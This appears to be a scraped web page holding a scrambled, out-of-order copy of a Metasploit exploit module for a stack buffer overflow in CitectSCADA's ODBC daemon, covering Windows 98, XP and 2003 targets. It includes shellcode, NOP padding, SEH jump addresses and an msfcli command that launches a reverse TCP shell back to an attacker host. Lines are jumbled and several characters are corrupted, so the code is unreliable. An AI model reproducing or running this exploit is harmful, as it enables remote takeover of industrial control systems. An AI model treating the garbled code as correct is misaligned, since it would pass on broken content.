Print_status("Use pattern_offset.rb to find the length") Mal = Rex::Text.pattern_create(payload_space, Rex::Text::DefaultPatternSets) # Use this to find offsets for other versions that were not provided. Mal = "\x90" * (payload_space - hell.length) + hell +. "\xa8\圆d\xf7\xbf" + # GetProcAddress(hmodule,functionname) "\xd0\x76\xf7\xbf" + # LoadLibraryA(libraryname) IN win98 # This is just sample code from the s using static addresses from MY win98 # Description : It is 110 Byte Shellcode which Pops up Message Box Under win98 pack("V") # Call EAX from CiExceptionMailer.dll Hop2 = target # Near jump into begining of entire buffer. Hop1 = 0xebb69090 # Short jump into small 72 byte buffer space - EBb6 # of time to have a robust exploit for any platform or version they choose. not just the guys running the modern stuff. # This particular target encompases win98 windows XP and windows 2003 just so that no one feels left out. Padding = 100 # Just fill up the end of the stack. Print_status("Using Windows 2003 Target") Shortjmp = 0xeb069090 # jump over garbage for SEH foo ['CiExceptionMailer.dll on XP Sp2 or SP3 5.42', ") The base address can varry unfortunately. There ARE universal targets for *some* versions. This has only been tested against Citect v5, v6 and v7. This module exploits a stack overflow in CitectSCADA's ODBC daemon. # Arbitrary code has been sucessfully run on Windows XP SP2 and SP3, Win98 SE and Windows 2003 Server SP1Ĭlass Exploits::Windows::Misc::Citect_SCADA_ODBC 'CitectSCADA ODBC Buffer Overflow', # C:\Program Files\Citect\CitectSCADA\Bin>
# (C) Copyright 1985-2001 Microsoft Corp. # msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E # Framework web site for more information on licensing and terms of use. # redistribution and commercial restrictions.
# This file is part of the Metasploit Framework and may be subject to
0 kommentar(er)
